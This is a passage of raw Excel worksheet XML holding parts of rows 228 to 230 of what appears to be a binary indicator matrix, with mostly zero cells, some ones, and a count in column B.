        <v>0</v>
      </c>
      <c r="PH228">
        <v>0</v>
      </c>
      <c r="PI228">
        <v>0</v>
      </c>
      <c r="PJ228">
        <v>0</v>
      </c>
      <c r="PK228">
        <v>0</v>
      </c>
      <c r="PL228">
        <v>0</v>
      </c>
      <c r="PM228">
        <v>0</v>
      </c>
      <c r="PN228">
        <v>0</v>
      </c>
      <c r="PO228">
        <v>0</v>
      </c>
      <c r="PP228">
        <v>0</v>
      </c>
      <c r="PQ228">
        <v>0</v>
      </c>
      <c r="PR228">
        <v>0</v>
      </c>
      <c r="PS228">
        <v>0</v>
      </c>
      <c r="PT228">
        <v>0</v>
      </c>
      <c r="PU228">
        <v>0</v>
      </c>
      <c r="PV228">
        <v>0</v>
      </c>
      <c r="PW228">
        <v>0</v>
      </c>
      <c r="PX228">
        <v>0</v>
      </c>
      <c r="PY228">
        <v>0</v>
      </c>
      <c r="PZ228">
        <v>0</v>
      </c>
      <c r="QA228">
        <v>0</v>
      </c>
      <c r="QB228">
        <v>0</v>
      </c>
      <c r="QC228">
        <v>0</v>
      </c>
      <c r="QD228">
        <v>0</v>
      </c>
      <c r="QE228">
        <v>0</v>
      </c>
      <c r="QF228">
        <v>0</v>
      </c>
      <c r="QG228">
        <v>0</v>
      </c>
      <c r="QH228">
        <v>0</v>
      </c>
      <c r="QI228">
        <v>0</v>
      </c>
      <c r="QJ228">
        <v>0</v>
      </c>
      <c r="QK228">
        <v>0</v>
      </c>
      <c r="QL228">
        <v>0</v>
      </c>
      <c r="QM228">
        <v>0</v>
      </c>
      <c r="QN228">
        <v>0</v>
      </c>
      <c r="QO228">
        <v>0</v>
      </c>
      <c r="QP228">
        <v>0</v>
      </c>
      <c r="QQ228">
        <v>0</v>
      </c>
      <c r="QR228">
        <v>0</v>
      </c>
      <c r="QS228">
        <v>0</v>
      </c>
      <c r="QT228">
        <v>0</v>
      </c>
      <c r="QU228">
        <v>0</v>
      </c>
      <c r="QV228">
        <v>0</v>
      </c>
      <c r="QW228">
        <v>0</v>
      </c>
      <c r="QX228">
        <v>0</v>
      </c>
      <c r="QY228">
        <v>0</v>
      </c>
      <c r="QZ228">
        <v>0</v>
      </c>
      <c r="RA228">
        <v>0</v>
      </c>
      <c r="RB228">
        <v>0</v>
      </c>
      <c r="RC228">
        <v>1</v>
      </c>
      <c r="RD228">
        <v>0</v>
      </c>
      <c r="RE228">
        <v>0</v>
      </c>
      <c r="RF228">
        <v>0</v>
      </c>
      <c r="RG228">
        <v>0</v>
      </c>
      <c r="RH228">
        <v>0</v>
      </c>
      <c r="RI228">
        <v>0</v>
      </c>
      <c r="RJ228">
        <v>0</v>
      </c>
      <c r="RK228">
        <v>0</v>
      </c>
      <c r="RL228">
        <v>0</v>
      </c>
      <c r="RM228">
        <v>0</v>
      </c>
      <c r="RN228">
        <v>0</v>
      </c>
      <c r="RO228">
        <v>0</v>
      </c>
      <c r="RP228">
        <v>0</v>
      </c>
      <c r="RQ228">
        <v>0</v>
      </c>
      <c r="RR228">
        <v>0</v>
      </c>
      <c r="RS228">
        <v>0</v>
      </c>
      <c r="RT228">
        <v>0</v>
      </c>
      <c r="RU228">
        <v>0</v>
      </c>
      <c r="RV228">
        <v>0</v>
      </c>
      <c r="RW228">
        <v>0</v>
      </c>
      <c r="RX228">
        <v>0</v>
      </c>
      <c r="RY228">
        <v>0</v>
      </c>
      <c r="RZ228">
        <v>0</v>
      </c>
      <c r="SA228">
        <v>0</v>
      </c>
    </row>
    <row r="229" spans="1:495" x14ac:dyDescent="0.2">
      <c r="A229" s="6" t="s">
        <v>5214</v>
      </c>
      <c r="B229">
        <v>61</v>
      </c>
      <c r="C229">
        <v>0</v>
      </c>
      <c r="D229">
        <v>0</v>
      </c>
      <c r="E229">
        <v>1</v>
      </c>
      <c r="F229">
        <v>0</v>
      </c>
      <c r="G229">
        <v>0</v>
      </c>
      <c r="H229">
        <v>0</v>
      </c>
      <c r="I229">
        <v>0</v>
      </c>
      <c r="J229">
        <v>0</v>
      </c>
      <c r="K229">
        <v>0</v>
      </c>
      <c r="L229">
        <v>0</v>
      </c>
      <c r="M229">
        <v>0</v>
      </c>
      <c r="N229">
        <v>0</v>
      </c>
      <c r="O229">
        <v>1</v>
      </c>
      <c r="P229">
        <v>0</v>
      </c>
      <c r="Q229">
        <v>0</v>
      </c>
      <c r="R229">
        <v>0</v>
      </c>
      <c r="S229">
        <v>1</v>
      </c>
      <c r="T229">
        <v>0</v>
      </c>
      <c r="U229">
        <v>0</v>
      </c>
      <c r="V229">
        <v>0</v>
      </c>
      <c r="W229">
        <v>0</v>
      </c>
      <c r="X229">
        <v>0</v>
      </c>
      <c r="Y229">
        <v>0</v>
      </c>
      <c r="Z229">
        <v>0</v>
      </c>
      <c r="AA229">
        <v>0</v>
      </c>
      <c r="AB229">
        <v>0</v>
      </c>
      <c r="AC229">
        <v>0</v>
      </c>
      <c r="AD229">
        <v>0</v>
      </c>
      <c r="AE229">
        <v>0</v>
      </c>
      <c r="AF229">
        <v>0</v>
      </c>
      <c r="AG229">
        <v>0</v>
      </c>
      <c r="AH229">
        <v>0</v>
      </c>
      <c r="AI229">
        <v>0</v>
      </c>
      <c r="AJ229">
        <v>0</v>
      </c>
      <c r="AK229">
        <v>0</v>
      </c>
      <c r="AL229">
        <v>1</v>
      </c>
      <c r="AM229">
        <v>0</v>
      </c>
      <c r="AN229">
        <v>0</v>
      </c>
      <c r="AO229">
        <v>1</v>
      </c>
      <c r="AP229">
        <v>0</v>
      </c>
      <c r="AQ229">
        <v>0</v>
      </c>
      <c r="AR229">
        <v>0</v>
      </c>
      <c r="AS229">
        <v>0</v>
      </c>
      <c r="AT229">
        <v>0</v>
      </c>
      <c r="AU229">
        <v>0</v>
      </c>
      <c r="AV229">
        <v>0</v>
      </c>
      <c r="AW229">
        <v>0</v>
      </c>
      <c r="AX229">
        <v>0</v>
      </c>
      <c r="AY229">
        <v>0</v>
      </c>
      <c r="AZ229">
        <v>0</v>
      </c>
      <c r="BA229">
        <v>0</v>
      </c>
      <c r="BB229">
        <v>0</v>
      </c>
      <c r="BC229">
        <v>0</v>
      </c>
      <c r="BD229">
        <v>1</v>
      </c>
      <c r="BE229">
        <v>0</v>
      </c>
      <c r="BF229">
        <v>0</v>
      </c>
      <c r="BG229">
        <v>0</v>
      </c>
      <c r="BH229">
        <v>0</v>
      </c>
      <c r="BI229">
        <v>0</v>
      </c>
      <c r="BJ229">
        <v>0</v>
      </c>
      <c r="BK229">
        <v>0</v>
      </c>
      <c r="BL229">
        <v>0</v>
      </c>
      <c r="BM229">
        <v>0</v>
      </c>
      <c r="BN229">
        <v>1</v>
      </c>
      <c r="BO229">
        <v>0</v>
      </c>
      <c r="BP229">
        <v>0</v>
      </c>
      <c r="BQ229">
        <v>0</v>
      </c>
      <c r="BR229">
        <v>0</v>
      </c>
      <c r="BS229">
        <v>0</v>
      </c>
      <c r="BT229">
        <v>0</v>
      </c>
      <c r="BU229">
        <v>0</v>
      </c>
      <c r="BV229">
        <v>0</v>
      </c>
      <c r="BW229">
        <v>0</v>
      </c>
      <c r="BX229">
        <v>0</v>
      </c>
      <c r="BY229">
        <v>0</v>
      </c>
      <c r="BZ229">
        <v>0</v>
      </c>
      <c r="CA229">
        <v>0</v>
      </c>
      <c r="CB229">
        <v>1</v>
      </c>
      <c r="CC229">
        <v>0</v>
      </c>
      <c r="CD229">
        <v>0</v>
      </c>
      <c r="CE229">
        <v>1</v>
      </c>
      <c r="CF229">
        <v>0</v>
      </c>
      <c r="CG229">
        <v>1</v>
      </c>
      <c r="CH229">
        <v>0</v>
      </c>
      <c r="CI229">
        <v>1</v>
      </c>
      <c r="CJ229">
        <v>0</v>
      </c>
      <c r="CK229">
        <v>0</v>
      </c>
      <c r="CL229">
        <v>0</v>
      </c>
      <c r="CM229">
        <v>0</v>
      </c>
      <c r="CN229">
        <v>0</v>
      </c>
      <c r="CO229">
        <v>0</v>
      </c>
      <c r="CP229">
        <v>0</v>
      </c>
      <c r="CQ229">
        <v>0</v>
      </c>
      <c r="CR229">
        <v>0</v>
      </c>
      <c r="CS229">
        <v>0</v>
      </c>
      <c r="CT229">
        <v>0</v>
      </c>
      <c r="CU229">
        <v>0</v>
      </c>
      <c r="CV229">
        <v>0</v>
      </c>
      <c r="CW229">
        <v>0</v>
      </c>
      <c r="CX229">
        <v>0</v>
      </c>
      <c r="CY229">
        <v>0</v>
      </c>
      <c r="CZ229">
        <v>0</v>
      </c>
      <c r="DA229">
        <v>0</v>
      </c>
      <c r="DB229">
        <v>0</v>
      </c>
      <c r="DC229">
        <v>0</v>
      </c>
      <c r="DD229">
        <v>0</v>
      </c>
      <c r="DE229">
        <v>1</v>
      </c>
      <c r="DF229">
        <v>0</v>
      </c>
      <c r="DG229">
        <v>0</v>
      </c>
      <c r="DH229">
        <v>0</v>
      </c>
      <c r="DI229">
        <v>1</v>
      </c>
      <c r="DJ229">
        <v>0</v>
      </c>
      <c r="DK229">
        <v>0</v>
      </c>
      <c r="DL229">
        <v>0</v>
      </c>
      <c r="DM229">
        <v>0</v>
      </c>
      <c r="DN229">
        <v>0</v>
      </c>
      <c r="DO229">
        <v>1</v>
      </c>
      <c r="DP229">
        <v>1</v>
      </c>
      <c r="DQ229">
        <v>1</v>
      </c>
      <c r="DR229">
        <v>0</v>
      </c>
      <c r="DS229">
        <v>0</v>
      </c>
      <c r="DT229">
        <v>0</v>
      </c>
      <c r="DU229">
        <v>0</v>
      </c>
      <c r="DV229">
        <v>0</v>
      </c>
      <c r="DW229">
        <v>0</v>
      </c>
      <c r="DX229">
        <v>1</v>
      </c>
      <c r="DY229">
        <v>0</v>
      </c>
      <c r="DZ229">
        <v>0</v>
      </c>
      <c r="EA229">
        <v>0</v>
      </c>
      <c r="EB229">
        <v>0</v>
      </c>
      <c r="EC229">
        <v>0</v>
      </c>
      <c r="ED229">
        <v>1</v>
      </c>
      <c r="EE229">
        <v>0</v>
      </c>
      <c r="EF229">
        <v>1</v>
      </c>
      <c r="EG229">
        <v>0</v>
      </c>
      <c r="EH229">
        <v>1</v>
      </c>
      <c r="EI229">
        <v>1</v>
      </c>
      <c r="EJ229">
        <v>0</v>
      </c>
      <c r="EK229">
        <v>0</v>
      </c>
      <c r="EL229">
        <v>0</v>
      </c>
      <c r="EM229">
        <v>0</v>
      </c>
      <c r="EN229">
        <v>0</v>
      </c>
      <c r="EO229">
        <v>0</v>
      </c>
      <c r="EP229">
        <v>0</v>
      </c>
      <c r="EQ229">
        <v>0</v>
      </c>
      <c r="ER229">
        <v>0</v>
      </c>
      <c r="ES229">
        <v>0</v>
      </c>
      <c r="ET229">
        <v>1</v>
      </c>
      <c r="EU229">
        <v>0</v>
      </c>
      <c r="EV229">
        <v>0</v>
      </c>
      <c r="EW229">
        <v>0</v>
      </c>
      <c r="EX229">
        <v>0</v>
      </c>
      <c r="EY229">
        <v>1</v>
      </c>
      <c r="EZ229">
        <v>0</v>
      </c>
      <c r="FA229">
        <v>0</v>
      </c>
      <c r="FB229">
        <v>0</v>
      </c>
      <c r="FC229">
        <v>0</v>
      </c>
      <c r="FD229">
        <v>0</v>
      </c>
      <c r="FE229">
        <v>0</v>
      </c>
      <c r="FF229">
        <v>0</v>
      </c>
      <c r="FG229">
        <v>0</v>
      </c>
      <c r="FH229">
        <v>0</v>
      </c>
      <c r="FI229">
        <v>0</v>
      </c>
      <c r="FJ229">
        <v>0</v>
      </c>
      <c r="FK229">
        <v>0</v>
      </c>
      <c r="FL229">
        <v>0</v>
      </c>
      <c r="FM229">
        <v>0</v>
      </c>
      <c r="FN229">
        <v>0</v>
      </c>
      <c r="FO229">
        <v>0</v>
      </c>
      <c r="FP229">
        <v>0</v>
      </c>
      <c r="FQ229">
        <v>0</v>
      </c>
      <c r="FR229">
        <v>0</v>
      </c>
      <c r="FS229">
        <v>0</v>
      </c>
      <c r="FT229">
        <v>0</v>
      </c>
      <c r="FU229">
        <v>0</v>
      </c>
      <c r="FV229">
        <v>0</v>
      </c>
      <c r="FW229">
        <v>0</v>
      </c>
      <c r="FX229">
        <v>0</v>
      </c>
      <c r="FY229">
        <v>0</v>
      </c>
      <c r="FZ229">
        <v>0</v>
      </c>
      <c r="GA229">
        <v>0</v>
      </c>
      <c r="GB229">
        <v>0</v>
      </c>
      <c r="GC229">
        <v>0</v>
      </c>
      <c r="GD229">
        <v>0</v>
      </c>
      <c r="GE229">
        <v>0</v>
      </c>
      <c r="GF229">
        <v>1</v>
      </c>
      <c r="GG229">
        <v>0</v>
      </c>
      <c r="GH229">
        <v>0</v>
      </c>
      <c r="GI229">
        <v>0</v>
      </c>
      <c r="GJ229">
        <v>0</v>
      </c>
      <c r="GK229">
        <v>0</v>
      </c>
      <c r="GL229">
        <v>1</v>
      </c>
      <c r="GM229">
        <v>0</v>
      </c>
      <c r="GN229">
        <v>0</v>
      </c>
      <c r="GO229">
        <v>0</v>
      </c>
      <c r="GP229">
        <v>0</v>
      </c>
      <c r="GQ229">
        <v>0</v>
      </c>
      <c r="GR229">
        <v>0</v>
      </c>
      <c r="GS229">
        <v>0</v>
      </c>
      <c r="GT229">
        <v>1</v>
      </c>
      <c r="GU229">
        <v>0</v>
      </c>
      <c r="GV229">
        <v>0</v>
      </c>
      <c r="GW229">
        <v>0</v>
      </c>
      <c r="GX229">
        <v>0</v>
      </c>
      <c r="GY229">
        <v>0</v>
      </c>
      <c r="GZ229">
        <v>0</v>
      </c>
      <c r="HA229">
        <v>0</v>
      </c>
      <c r="HB229">
        <v>0</v>
      </c>
      <c r="HC229">
        <v>0</v>
      </c>
      <c r="HD229">
        <v>0</v>
      </c>
      <c r="HE229">
        <v>0</v>
      </c>
      <c r="HF229">
        <v>0</v>
      </c>
      <c r="HG229">
        <v>0</v>
      </c>
      <c r="HH229">
        <v>0</v>
      </c>
      <c r="HI229">
        <v>0</v>
      </c>
      <c r="HJ229">
        <v>0</v>
      </c>
      <c r="HK229">
        <v>0</v>
      </c>
      <c r="HL229">
        <v>0</v>
      </c>
      <c r="HM229">
        <v>0</v>
      </c>
      <c r="HN229">
        <v>0</v>
      </c>
      <c r="HO229">
        <v>0</v>
      </c>
      <c r="HP229">
        <v>0</v>
      </c>
      <c r="HQ229">
        <v>0</v>
      </c>
      <c r="HR229">
        <v>0</v>
      </c>
      <c r="HS229">
        <v>0</v>
      </c>
      <c r="HT229">
        <v>0</v>
      </c>
      <c r="HU229">
        <v>0</v>
      </c>
      <c r="HV229">
        <v>0</v>
      </c>
      <c r="HW229">
        <v>0</v>
      </c>
      <c r="HX229">
        <v>0</v>
      </c>
      <c r="HY229">
        <v>0</v>
      </c>
      <c r="HZ229">
        <v>0</v>
      </c>
      <c r="IA229">
        <v>0</v>
      </c>
      <c r="IB229">
        <v>0</v>
      </c>
      <c r="IC229">
        <v>1</v>
      </c>
      <c r="ID229">
        <v>1</v>
      </c>
      <c r="IE229">
        <v>0</v>
      </c>
      <c r="IF229">
        <v>0</v>
      </c>
      <c r="IG229">
        <v>0</v>
      </c>
      <c r="IH229">
        <v>0</v>
      </c>
      <c r="II229">
        <v>0</v>
      </c>
      <c r="IJ229">
        <v>0</v>
      </c>
      <c r="IK229">
        <v>0</v>
      </c>
      <c r="IL229">
        <v>0</v>
      </c>
      <c r="IM229">
        <v>0</v>
      </c>
      <c r="IN229">
        <v>1</v>
      </c>
      <c r="IO229">
        <v>0</v>
      </c>
      <c r="IP229">
        <v>1</v>
      </c>
      <c r="IQ229">
        <v>1</v>
      </c>
      <c r="IR229">
        <v>0</v>
      </c>
      <c r="IS229">
        <v>0</v>
      </c>
      <c r="IT229">
        <v>0</v>
      </c>
      <c r="IU229">
        <v>0</v>
      </c>
      <c r="IV229">
        <v>0</v>
      </c>
      <c r="IW229">
        <v>0</v>
      </c>
      <c r="IX229">
        <v>0</v>
      </c>
      <c r="IY229">
        <v>0</v>
      </c>
      <c r="IZ229">
        <v>0</v>
      </c>
      <c r="JA229">
        <v>0</v>
      </c>
      <c r="JB229">
        <v>0</v>
      </c>
      <c r="JC229">
        <v>0</v>
      </c>
      <c r="JD229">
        <v>0</v>
      </c>
      <c r="JE229">
        <v>1</v>
      </c>
      <c r="JF229">
        <v>0</v>
      </c>
      <c r="JG229">
        <v>0</v>
      </c>
      <c r="JH229">
        <v>0</v>
      </c>
      <c r="JI229">
        <v>1</v>
      </c>
      <c r="JJ229">
        <v>0</v>
      </c>
      <c r="JK229">
        <v>0</v>
      </c>
      <c r="JL229">
        <v>0</v>
      </c>
      <c r="JM229">
        <v>0</v>
      </c>
      <c r="JN229">
        <v>0</v>
      </c>
      <c r="JO229">
        <v>0</v>
      </c>
      <c r="JP229">
        <v>0</v>
      </c>
      <c r="JQ229">
        <v>0</v>
      </c>
      <c r="JR229">
        <v>0</v>
      </c>
      <c r="JS229">
        <v>0</v>
      </c>
      <c r="JT229">
        <v>0</v>
      </c>
      <c r="JU229">
        <v>0</v>
      </c>
      <c r="JV229">
        <v>0</v>
      </c>
      <c r="JW229">
        <v>0</v>
      </c>
      <c r="JX229">
        <v>0</v>
      </c>
      <c r="JY229">
        <v>0</v>
      </c>
      <c r="JZ229">
        <v>0</v>
      </c>
      <c r="KA229">
        <v>0</v>
      </c>
      <c r="KB229">
        <v>0</v>
      </c>
      <c r="KC229">
        <v>0</v>
      </c>
      <c r="KD229">
        <v>0</v>
      </c>
      <c r="KE229">
        <v>1</v>
      </c>
      <c r="KF229">
        <v>0</v>
      </c>
      <c r="KG229">
        <v>1</v>
      </c>
      <c r="KH229">
        <v>1</v>
      </c>
      <c r="KI229">
        <v>0</v>
      </c>
      <c r="KJ229">
        <v>0</v>
      </c>
      <c r="KK229">
        <v>0</v>
      </c>
      <c r="KL229">
        <v>0</v>
      </c>
      <c r="KM229">
        <v>0</v>
      </c>
      <c r="KN229">
        <v>0</v>
      </c>
      <c r="KO229">
        <v>0</v>
      </c>
      <c r="KP229">
        <v>0</v>
      </c>
      <c r="KQ229">
        <v>1</v>
      </c>
      <c r="KR229">
        <v>0</v>
      </c>
      <c r="KS229">
        <v>0</v>
      </c>
      <c r="KT229">
        <v>0</v>
      </c>
      <c r="KU229">
        <v>0</v>
      </c>
      <c r="KV229">
        <v>0</v>
      </c>
      <c r="KW229">
        <v>0</v>
      </c>
      <c r="KX229">
        <v>0</v>
      </c>
      <c r="KY229">
        <v>0</v>
      </c>
      <c r="KZ229">
        <v>0</v>
      </c>
      <c r="LA229">
        <v>0</v>
      </c>
      <c r="LB229">
        <v>0</v>
      </c>
      <c r="LC229">
        <v>0</v>
      </c>
      <c r="LD229">
        <v>1</v>
      </c>
      <c r="LE229">
        <v>0</v>
      </c>
      <c r="LF229">
        <v>0</v>
      </c>
      <c r="LG229">
        <v>0</v>
      </c>
      <c r="LH229">
        <v>0</v>
      </c>
      <c r="LI229">
        <v>0</v>
      </c>
      <c r="LJ229">
        <v>0</v>
      </c>
      <c r="LK229">
        <v>0</v>
      </c>
      <c r="LL229">
        <v>0</v>
      </c>
      <c r="LM229">
        <v>0</v>
      </c>
      <c r="LN229">
        <v>0</v>
      </c>
      <c r="LO229">
        <v>0</v>
      </c>
      <c r="LP229">
        <v>0</v>
      </c>
      <c r="LQ229">
        <v>0</v>
      </c>
      <c r="LR229">
        <v>0</v>
      </c>
      <c r="LS229">
        <v>0</v>
      </c>
      <c r="LT229">
        <v>0</v>
      </c>
      <c r="LU229">
        <v>0</v>
      </c>
      <c r="LV229">
        <v>1</v>
      </c>
      <c r="LW229">
        <v>1</v>
      </c>
      <c r="LX229">
        <v>0</v>
      </c>
      <c r="LY229">
        <v>0</v>
      </c>
      <c r="LZ229">
        <v>0</v>
      </c>
      <c r="MA229">
        <v>0</v>
      </c>
      <c r="MB229">
        <v>0</v>
      </c>
      <c r="MC229">
        <v>0</v>
      </c>
      <c r="MD229">
        <v>0</v>
      </c>
      <c r="ME229">
        <v>0</v>
      </c>
      <c r="MF229">
        <v>0</v>
      </c>
      <c r="MG229">
        <v>0</v>
      </c>
      <c r="MH229">
        <v>0</v>
      </c>
      <c r="MI229">
        <v>0</v>
      </c>
      <c r="MJ229">
        <v>0</v>
      </c>
      <c r="MK229">
        <v>0</v>
      </c>
      <c r="ML229">
        <v>1</v>
      </c>
      <c r="MM229">
        <v>0</v>
      </c>
      <c r="MN229">
        <v>0</v>
      </c>
      <c r="MO229">
        <v>0</v>
      </c>
      <c r="MP229">
        <v>0</v>
      </c>
      <c r="MQ229">
        <v>0</v>
      </c>
      <c r="MR229">
        <v>1</v>
      </c>
      <c r="MS229">
        <v>0</v>
      </c>
      <c r="MT229">
        <v>0</v>
      </c>
      <c r="MU229">
        <v>0</v>
      </c>
      <c r="MV229">
        <v>0</v>
      </c>
      <c r="MW229">
        <v>0</v>
      </c>
      <c r="MX229">
        <v>0</v>
      </c>
      <c r="MY229">
        <v>0</v>
      </c>
      <c r="MZ229">
        <v>0</v>
      </c>
      <c r="NA229">
        <v>0</v>
      </c>
      <c r="NB229">
        <v>0</v>
      </c>
      <c r="NC229">
        <v>0</v>
      </c>
      <c r="ND229">
        <v>0</v>
      </c>
      <c r="NE229">
        <v>0</v>
      </c>
      <c r="NF229">
        <v>0</v>
      </c>
      <c r="NG229">
        <v>0</v>
      </c>
      <c r="NH229">
        <v>0</v>
      </c>
      <c r="NI229">
        <v>0</v>
      </c>
      <c r="NJ229">
        <v>0</v>
      </c>
      <c r="NK229">
        <v>1</v>
      </c>
      <c r="NL229">
        <v>0</v>
      </c>
      <c r="NM229">
        <v>0</v>
      </c>
      <c r="NN229">
        <v>0</v>
      </c>
      <c r="NO229">
        <v>0</v>
      </c>
      <c r="NP229">
        <v>0</v>
      </c>
      <c r="NQ229">
        <v>0</v>
      </c>
      <c r="NR229">
        <v>0</v>
      </c>
      <c r="NS229">
        <v>0</v>
      </c>
      <c r="NT229">
        <v>0</v>
      </c>
      <c r="NU229">
        <v>0</v>
      </c>
      <c r="NV229">
        <v>0</v>
      </c>
      <c r="NW229">
        <v>0</v>
      </c>
      <c r="NX229">
        <v>0</v>
      </c>
      <c r="NY229">
        <v>0</v>
      </c>
      <c r="NZ229">
        <v>0</v>
      </c>
      <c r="OA229">
        <v>0</v>
      </c>
      <c r="OB229">
        <v>1</v>
      </c>
      <c r="OC229">
        <v>0</v>
      </c>
      <c r="OD229">
        <v>0</v>
      </c>
      <c r="OE229">
        <v>0</v>
      </c>
      <c r="OF229">
        <v>0</v>
      </c>
      <c r="OG229">
        <v>0</v>
      </c>
      <c r="OH229">
        <v>0</v>
      </c>
      <c r="OI229">
        <v>0</v>
      </c>
      <c r="OJ229">
        <v>1</v>
      </c>
      <c r="OK229">
        <v>1</v>
      </c>
      <c r="OL229">
        <v>1</v>
      </c>
      <c r="OM229">
        <v>0</v>
      </c>
      <c r="ON229">
        <v>0</v>
      </c>
      <c r="OO229">
        <v>0</v>
      </c>
      <c r="OP229">
        <v>0</v>
      </c>
      <c r="OQ229">
        <v>1</v>
      </c>
      <c r="OR229">
        <v>0</v>
      </c>
      <c r="OS229">
        <v>0</v>
      </c>
      <c r="OT229">
        <v>0</v>
      </c>
      <c r="OU229">
        <v>0</v>
      </c>
      <c r="OV229">
        <v>0</v>
      </c>
      <c r="OW229">
        <v>0</v>
      </c>
      <c r="OX229">
        <v>0</v>
      </c>
      <c r="OY229">
        <v>0</v>
      </c>
      <c r="OZ229">
        <v>0</v>
      </c>
      <c r="PA229">
        <v>1</v>
      </c>
      <c r="PB229">
        <v>1</v>
      </c>
      <c r="PC229">
        <v>1</v>
      </c>
      <c r="PD229">
        <v>0</v>
      </c>
      <c r="PE229">
        <v>0</v>
      </c>
      <c r="PF229">
        <v>0</v>
      </c>
      <c r="PG229">
        <v>0</v>
      </c>
      <c r="PH229">
        <v>0</v>
      </c>
      <c r="PI229">
        <v>0</v>
      </c>
      <c r="PJ229">
        <v>0</v>
      </c>
      <c r="PK229">
        <v>0</v>
      </c>
      <c r="PL229">
        <v>0</v>
      </c>
      <c r="PM229">
        <v>0</v>
      </c>
      <c r="PN229">
        <v>0</v>
      </c>
      <c r="PO229">
        <v>0</v>
      </c>
      <c r="PP229">
        <v>0</v>
      </c>
      <c r="PQ229">
        <v>0</v>
      </c>
      <c r="PR229">
        <v>0</v>
      </c>
      <c r="PS229">
        <v>0</v>
      </c>
      <c r="PT229">
        <v>1</v>
      </c>
      <c r="PU229">
        <v>1</v>
      </c>
      <c r="PV229">
        <v>0</v>
      </c>
      <c r="PW229">
        <v>0</v>
      </c>
      <c r="PX229">
        <v>0</v>
      </c>
      <c r="PY229">
        <v>0</v>
      </c>
      <c r="PZ229">
        <v>0</v>
      </c>
      <c r="QA229">
        <v>0</v>
      </c>
      <c r="QB229">
        <v>1</v>
      </c>
      <c r="QC229">
        <v>0</v>
      </c>
      <c r="QD229">
        <v>0</v>
      </c>
      <c r="QE229">
        <v>0</v>
      </c>
      <c r="QF229">
        <v>0</v>
      </c>
      <c r="QG229">
        <v>0</v>
      </c>
      <c r="QH229">
        <v>0</v>
      </c>
      <c r="QI229">
        <v>0</v>
      </c>
      <c r="QJ229">
        <v>1</v>
      </c>
      <c r="QK229">
        <v>0</v>
      </c>
      <c r="QL229">
        <v>0</v>
      </c>
      <c r="QM229">
        <v>0</v>
      </c>
      <c r="QN229">
        <v>0</v>
      </c>
      <c r="QO229">
        <v>0</v>
      </c>
      <c r="QP229">
        <v>0</v>
      </c>
      <c r="QQ229">
        <v>1</v>
      </c>
      <c r="QR229">
        <v>0</v>
      </c>
      <c r="QS229">
        <v>0</v>
      </c>
      <c r="QT229">
        <v>0</v>
      </c>
      <c r="QU229">
        <v>0</v>
      </c>
      <c r="QV229">
        <v>1</v>
      </c>
      <c r="QW229">
        <v>0</v>
      </c>
      <c r="QX229">
        <v>0</v>
      </c>
      <c r="QY229">
        <v>0</v>
      </c>
      <c r="QZ229">
        <v>1</v>
      </c>
      <c r="RA229">
        <v>0</v>
      </c>
      <c r="RB229">
        <v>0</v>
      </c>
      <c r="RC229">
        <v>1</v>
      </c>
      <c r="RD229">
        <v>0</v>
      </c>
      <c r="RE229">
        <v>0</v>
      </c>
      <c r="RF229">
        <v>0</v>
      </c>
      <c r="RG229">
        <v>0</v>
      </c>
      <c r="RH229">
        <v>0</v>
      </c>
      <c r="RI229">
        <v>0</v>
      </c>
      <c r="RJ229">
        <v>0</v>
      </c>
      <c r="RK229">
        <v>0</v>
      </c>
      <c r="RL229">
        <v>0</v>
      </c>
      <c r="RM229">
        <v>1</v>
      </c>
      <c r="RN229">
        <v>0</v>
      </c>
      <c r="RO229">
        <v>0</v>
      </c>
      <c r="RP229">
        <v>1</v>
      </c>
      <c r="RQ229">
        <v>0</v>
      </c>
      <c r="RR229">
        <v>0</v>
      </c>
      <c r="RS229">
        <v>0</v>
      </c>
      <c r="RT229">
        <v>0</v>
      </c>
      <c r="RU229">
        <v>0</v>
      </c>
      <c r="RV229">
        <v>0</v>
      </c>
      <c r="RW229">
        <v>0</v>
      </c>
      <c r="RX229">
        <v>0</v>
      </c>
      <c r="RY229">
        <v>0</v>
      </c>
      <c r="RZ229">
        <v>0</v>
      </c>
      <c r="SA229">
        <v>0</v>
      </c>
    </row>
    <row r="230" spans="1:495" x14ac:dyDescent="0.2">
      <c r="A230" s="6" t="s">
        <v>5257</v>
      </c>
      <c r="B230">
        <v>4</v>
      </c>
      <c r="C230">
        <v>0</v>
      </c>
      <c r="D230">
        <v>0</v>
      </c>
      <c r="E230">
        <v>0</v>
      </c>
      <c r="F230">
        <v>0</v>
      </c>
      <c r="G230">
        <v>0</v>
      </c>
      <c r="H230">
        <v>0</v>
      </c>
      <c r="I230">
        <v>0</v>
      </c>
      <c r="J230">
        <v>0</v>
      </c>
      <c r="K230">
        <v>0</v>
      </c>
      <c r="L230">
        <v>0</v>
      </c>
      <c r="M230">
        <v>0</v>
      </c>
      <c r="N230">
        <v>0</v>
      </c>
      <c r="O230">
        <v>0</v>
      </c>
      <c r="P230">
        <v>0</v>
      </c>
      <c r="Q230">
        <v>0</v>
      </c>
      <c r="R230">
        <v>0</v>
      </c>
      <c r="S230">
        <v>0</v>
      </c>
      <c r="T230">
        <v>0</v>
      </c>
      <c r="U230">
        <v>0</v>
      </c>
      <c r="V230">
        <v>0</v>
      </c>
      <c r="W230">
        <v>0</v>
      </c>
      <c r="X230">
        <v>0</v>
      </c>
      <c r="Y230">
        <v>0</v>
      </c>
      <c r="Z230">
        <v>0</v>
      </c>
      <c r="AA230">
        <v>0</v>
      </c>
      <c r="AB230">
        <v>0</v>
      </c>
      <c r="AC230">
        <v>0</v>
      </c>
      <c r="AD230">
        <v>0</v>
      </c>
      <c r="AE230">
        <v>0</v>
      </c>
      <c r="AF230">
        <v>0</v>
      </c>
      <c r="AG230">
        <v>0</v>
      </c>
      <c r="AH230">
        <v>0</v>
      </c>
      <c r="AI230">
        <v>0</v>
      </c>
      <c r="AJ230">
        <v>0</v>
      </c>
      <c r="AK230">
        <v>0</v>
      </c>
      <c r="AL230">
        <v>0</v>
      </c>
      <c r="AM230">
        <v>0</v>
      </c>
      <c r="AN230">
        <v>0</v>
      </c>
      <c r="AO230">
        <v>0</v>
      </c>
      <c r="AP230">
        <v>0</v>
      </c>
      <c r="AQ230">
        <v>0</v>
      </c>
      <c r="AR230">
        <v>0</v>
      </c>
      <c r="AS230">
        <v>0</v>
      </c>
      <c r="AT230">
        <v>0</v>
      </c>
      <c r="AU230">
        <v>0</v>
      </c>
      <c r="AV230">
        <v>0</v>
      </c>
      <c r="AW230">
        <v>0</v>
      </c>
      <c r="AX230">
        <v>0</v>
      </c>
      <c r="AY230">
        <v>0</v>
      </c>
      <c r="AZ230">
        <v>0</v>
      </c>
      <c r="BA230">
        <v>0</v>
